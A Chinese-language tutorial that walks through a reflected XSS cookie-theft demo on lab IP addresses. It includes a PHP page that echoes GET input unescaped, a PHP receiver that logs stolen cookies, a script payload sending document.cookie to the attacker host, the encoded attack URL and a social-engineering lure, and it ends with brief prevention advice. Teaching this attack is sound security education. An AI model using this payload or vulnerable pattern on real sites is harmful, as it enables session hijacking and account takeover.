大多數人對于XSS的原理有一個基本認識，這里不再重復，只給出一個能夠演示其原理的完整樣例。

1 角色分配

• 有XXS漏洞的網站，IP地址172.16.35.135，PHP為開發語言
• 受害訪問者，IP地址172.16.35.220，瀏覽器為IE11
• 黑客的數據接收網站，IP地址172.16.2.192，PHP為開發語言

2 源碼實例

2.1 漏洞網站

存在漏洞的URL為:http://172.16.35.135/xss_demo.php

<?php

session_start();

?>

<!doctype html>

<html>

    <head>

        <title>XSS demo</title>

    </head>

    <body>

    <form>

    <input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" />

            <input type="submit" value="Submit" />

        </form>

    </body>

</html>

該網頁把用戶通過GET發送過來的表單數據，未經處理直接寫入返回的html流，這就是XSS漏洞所在。

2.2 黑客接收網站

接收網站的URL為 http://172.16.2.192/xss_hacker.php

<?php

$victim = ''XXS得到的 cookie:''. $_SERVER[''REMOTE_ADDR'']. '':'' .$_GET[''cookie''];

file_put_contents(''xss_victim.txt'', $victim);

把受害用戶的IP地址和訪問漏洞網站時使用的cookie，一起寫入xss_victim.txt文件保存備用。

2.3 用戶正常訪問

用戶使用IE11訪問網站。現在網站一般都采用session+cookie來保存用戶登錄信息，網站通過驗證cookie來確實是否是合法已登錄用戶，所以cookie是用戶的敏感數據.

3 攻擊過程

3.1 黑客準備攻擊字符串，構造攻擊URL

黑客可以通過各種掃描工具或者人工輸入來找到有XSS漏洞的網站URL，然后精心構造攻擊字符串。對于本例來說構造出來的字符串為：

"/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--

只要把這個字符串作為漏洞網站文本編輯框的表單值輸入提交，就會造成攻擊。手工輸入這個字符串，并提交，瀏覽器地址欄自動生成攻擊URL。如下圖：

此時，用戶訪問漏洞網站的html代碼，被修改成了：

<!doctype html>

<html>

<head>

<title>XSS demo</title>

</head>

<body>

<form>

<input style="width:500px;" type="text" name="address1" value=""/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--" />

<input type="submit" value="Submit" />

</form>

</body>

</html>

明顯看出，這個html回去執行一個腳本，這個腳本功能是把用戶的cookie發送到黑客的接收網站。

最終生成的攻擊URL為：

http://172.16.35.135/xss_demo.php?address1=%22%2F%3E+%3Cscript%3Ewindow.open%28%22http%3A%2F%2F172.16.2.192%2Fxss_hacker.php%3Fcookie%3D%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E%3C%21--

接下來要做的就是，尋找受害人，誘惑其點擊上述URL。

3.2 用戶上當誤點擊攻擊URL

黑客可以采取各種手段，包括發Email，在各種論壇網站發布此攻擊URL，如做成如下誘人連接。

屌絲們最喜歡美女了，在好奇心的驅動下，點擊了這個美女圖片。而點擊的后果正是訪問前面的攻擊URL。

3.3 用戶敏感數據被發送到黑客接收網站

受害用戶訪問攻擊URL后，其敏感數據自動發送到黑客的接收網站。接收網站把這些敏感信息保存到文件中，當然現實的情況一定是存入數據庫中了。

xss_victim.txt中現在保存了受害者的敏感數據。

 XXS得到的 cookie:172.16.35.220:PHPSESSID=4duu55hgci1leee4os6101cl30

注意，默認IE11開啟了XSS篩選器，此時IE會阻止上述簡單攻擊腳本。為模擬攻擊，我們臨時把XSS篩選器禁用。

3.4 黑客利用敏感數據做壞事

有了受害用戶的敏感數據，就可以利用這些數據做各種壞事了，比如以受害用戶身份登錄漏洞網站，等等。

4 XSS的預防

XSS的預防可以從多方面著手：

（1）如前面所述，瀏覽器自身可以識別簡單的XSS攻擊字符串，從而阻止簡單的XSS攻擊；

（2）從根本上說，解決辦法是消除網站的XSS漏洞，這就需要網站開發者運用轉義安全字符等手段，始終把安全放在心上；

（3）對于普通網民，需要注意盡量抵擋誘惑，別去點擊非知名網站的鏈接。